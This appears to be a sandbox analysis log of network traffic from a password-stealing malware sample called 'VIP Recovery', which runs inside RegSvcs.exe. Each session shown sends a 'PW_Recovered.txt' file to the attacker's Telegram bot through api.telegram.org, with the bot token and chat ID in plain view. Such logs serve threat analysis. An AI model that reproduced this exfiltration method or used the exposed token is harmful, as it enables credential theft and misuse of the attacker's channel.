                                                                          2024-09-19 10:24:25 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12828,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          99192.168.2.561673149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:25 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd00e934167454
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:25 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 65 39 33 34 31 36 37 34 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd00e934167454Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:26 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:26 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:26 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12829,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          100192.168.2.561676149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:28 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcfdfaba9eabda
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:28 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 64 66 61 62 61 39 65 61 62 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcfdfaba9eabdaContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:29 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:29 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:29 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12830,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          101192.168.2.561678149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:30 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd01771edfcbec
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:30 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 31 37 37 31 65 64 66 63 62 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd01771edfcbecContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:31 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:30 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:31 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12831,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          102192.168.2.561680149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:33 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcfed4e660b567
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:33 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 65 64 34 65 36 36 30 62 35 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcfed4e660b567Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:34 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:34 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:34 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12832,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          103192.168.2.561681149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:34 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd0417862dab04
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:34 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 34 31 37 38 36 32 64 61 62 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd0417862dab04Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:35 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:34 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:35 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12833,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          104192.168.2.561684149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:38 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd002a375df3af
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:38 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 32 61 33 37 35 64 66 33 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dd002a375df3afContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:38 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:38 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:38 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12835,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          105192.168.2.561685149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:39 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd04a7c7a5e552
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:39 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 34 61 37 63 37 61 35 65 35 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd04a7c7a5e552Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:39 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:39 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
